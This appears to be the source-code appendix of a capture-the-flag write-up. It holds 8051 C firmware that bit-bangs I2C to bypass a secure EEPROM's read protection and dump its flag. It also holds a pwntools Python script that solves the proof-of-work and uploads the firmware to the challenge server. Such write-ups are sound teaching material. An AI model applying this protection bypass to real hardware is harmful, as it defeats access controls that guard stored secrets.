  • I2C uses one address byte, and then sends or receives data, depending on the operation.
  • I2C transactions start with a start signal and stops with a stop signal.

Appendix C. Source Code:

// exploit.c

__sfr __at(0xff) POWEROFF;
__sfr __at(0xfd) CHAROUT;

__xdata __at(0xee00) unsigned char MYBUF[0x100];

__sfr __at(0xfa) RAW_I2C_SCL;
__sfr __at(0xfb) RAW_I2C_SDA;

const SEEPROM_I2C_ADDR_MEMORY = 0b10100000; // 0xa0
const SEEPROM_I2C_ADDR_SECURE = 0b01010000; // 0x50

void printMYBUFF()
{
  int i = 0;
  for(i=0; i<0x100; i++)
  {
    CHAROUT = MYBUF[i];
  }
}

unsigned char bitbang_recv_byte() {
  int i;
  char c;
  for (i = 0; i<= 7; ++i) {
    RAW_I2C_SCL = 0;
    RAW_I2C_SCL = 1;
    c = (c << 1) | RAW_I2C_SDA ;
  }
  return c;
}

void bitbang_send_byte(unsigned char data) {
  int i;
  for (i = 0; i<= 7; ++i) {
    RAW_I2C_SCL = 0;    
    RAW_I2C_SDA = ((data >> (7-i)) & 1);
    RAW_I2C_SCL = 1;
  }
}

char bitbang_recv_ack(void) {
  char val = 0;
  RAW_I2C_SCL = 0;
  RAW_I2C_SCL = 1;
  val = RAW_I2C_SDA ^ 1;
  return val;
}

void bitbang_start() {
   RAW_I2C_SCL = 0;
   RAW_I2C_SDA = 1;
   RAW_I2C_SCL = 1;
   RAW_I2C_SDA = 0;
}

void bitbang_read_flag(unsigned char addr) {
  char c;
  int i = 0;
  // WRITE operation
  bitbang_start();
  bitbang_send_byte(SEEPROM_I2C_ADDR_MEMORY | 0); 
  bitbang_recv_ack();

  //LOAD address
  bitbang_send_byte(addr);
  bitbang_recv_ack();

  // READ 1 byte
  bitbang_start();
  bitbang_send_byte(SEEPROM_I2C_ADDR_MEMORY | 1); 
  bitbang_recv_ack();
  MYBUF[i] = bitbang_recv_byte();

  // SECURE address
  bitbang_start();
  bitbang_send_byte(SEEPROM_I2C_ADDR_SECURE | 0b0001);
  bitbang_recv_ack();

  // READ operation
  bitbang_start();
  bitbang_send_byte(SEEPROM_I2C_ADDR_MEMORY | 1);
  bitbang_recv_ack();

  // READ 64 bytes
  for (i=1; i<64; i++) {
    MYBUF[i] = bitbang_recv_byte();
    bitbang_recv_ack();
  }
}

void main(void) {
  int i;
  for (i = 0; i<0x100; ++i) {
    MYBUF[i] = 0x42;  
  }
  MYBUF[i] = 0;

  bitbang_read_flag(61);
  printMYBUFF();
  POWEROFF = 1;

}
# exploit.py

import hashlib
import string
import socket
from sys import argv

from pwn import remote
from pwn import *

def get_pow(prefix):
    m = hashlib.md5()
    for c1 in string.printable:
        for c2 in string.printable:
            for c3 in string.printable:
                for c4 in string.printable:
                    for c5 in string.printable:
                        s = 'flagrom-' + c1 + c2 + c3 + c4 + c5
                        if hashlib.md5(s).hexdigest().startswith(prefix):
                            return s


def local_ctf():
    p = tubes.process.process('flagrom');
    do_all(p)

def remote_ctf():
    p = remote('flagrom.ctfcompetition.com', 1337)
    do_all(p)

def do_all(s):
    res = s.recvline()
    print res
    prefix = res.split(' ')[-1][:-2]
    print 'prefix: %s' % prefix    
    resp = get_pow(prefix)
    print 'found md5: %s' % resp
    s.sendline(resp)

    res = s.recvline()
    print res
    f = open('exploit.8051', 'rb')
    data = f.read()
    f.close()
    print 'sending response: %d\n' % len(data)

    s.sendline('%d' % len(data))
    s.sendline(data)
    s.interactive()

def main():
    #local_ctf()
    remote_ctf()

if __name__ == '__main__':
    main()